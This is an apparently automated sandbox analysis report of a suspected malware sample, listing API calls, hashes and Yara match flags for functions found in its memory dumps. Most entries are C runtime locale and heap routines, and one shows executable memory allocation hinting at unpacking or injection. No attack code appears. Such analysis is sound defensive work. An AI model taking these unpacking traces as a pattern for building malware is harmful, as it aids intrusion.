• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
• String ID:
• API String ID: 3585332825-0
• Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
• Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
• Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
• Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                  • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0411C9E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0411C000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_411c000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction ID: 726a4e5d5120e02daf728ff77f82a357090ba5b32fa4be5ce30ab480f5d18166
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE113C79A40208EFDB01DF98C985E99BBF5AF08350F0580A5F9489B361E371EA50DF80
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                  • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID: 0B$DCA
                                                                                                                                                                                                                                  • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP$B
                                                                                                                                                                                                                                  • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,05BD0D4D,?,00000000), ref: 05BD0AC7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,05BD0D4D,?,00000000), ref: 05BD0AF0
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,05BD0D4D,?,00000000), ref: 05BD0B05
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                  • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction ID: cc7cd76f0ea292ed5b8cde90b7f4a9219c22b314b1ff3294876ab26343467227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16218B22B46108AAD730AB548948EA7F7A7FB80A64F4684A4E90A97100FB26ED41C760
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FDF
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FEC
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05BD0D0E
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 05BD0D69
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 05BD0D78
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,05BC45A4,00000040,?,05BC46C4,00000055,00000000,?,?,00000055,00000000), ref: 05BD0DC0
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,05BC4624,00000040), ref: 05BD0DDF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 745075371-0
                                                                                                                                                                                                                                  • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction ID: d8336891d5cea96b023a4caf51575ffb6c4d8912856d00bbd9e11e79efe2d57b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A516F75A0420DAADB20EFA5DC49ABEB7B8FF44700F4444AAE905E7150FB70B9448B71
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,05BC45AB,?,?,?,?,05BC4002,?,00000004), ref: 05BD03AC
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 05BD043C
                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 05BD044A
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,05BC45AB,00000000,05BC46CB), ref: 05BD04ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4212172061-0
                                                                                                                                                                                                                                  • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction ID: 4d918992920b58d8a517b134ef9f93f94aace39c97f9fa4948bcf18a7ff0441b
• Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction Fuzzy Hash: 5461A47170460AAAD724FB74DC49FBAB7A8FF08750F1444EAE90597180FA74B9448BB4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
• EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: =CA${B
• API String ID: 1084509184-2907596089
• Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
• Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
• Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
• Instruction ID: 0a5b7635404548c57dba04d673b23d0d738cd004557a8c14c23e3f7788b99776
• Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
• Instruction Fuzzy Hash: 07B18E75A002099FDB21DFA9C884BEEFBF5FF08300F1440EDE996A7241DB75A9458B64
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0041F695
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
• _free.LIBCMT ref: 0041F68A
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041F6AC
• _free.LIBCMT ref: 0041F6C1
• _free.LIBCMT ref: 0041F6CC
• _free.LIBCMT ref: 0041F6EE
• _free.LIBCMT ref: 0041F701
• _free.LIBCMT ref: 0041F70F
• _free.LIBCMT ref: 0041F71A
• _free.LIBCMT ref: 0041F752
• _free.LIBCMT ref: 0041F759
• _free.LIBCMT ref: 0041F776
• _free.LIBCMT ref: 0041F78E
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
• Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 05BCF8FC
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC68
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC7A
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC8C
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCEC9E
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECB0
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECC2
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECD4
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECE6
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCECF8
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED0A
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED1C
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED2E
  • Part of subcall function 05BCEC4B: _free.LIBCMT ref: 05BCED40
• _free.LIBCMT ref: 05BCF8F1
  • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
  • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
• _free.LIBCMT ref: 05BCF913
• _free.LIBCMT ref: 05BCF928
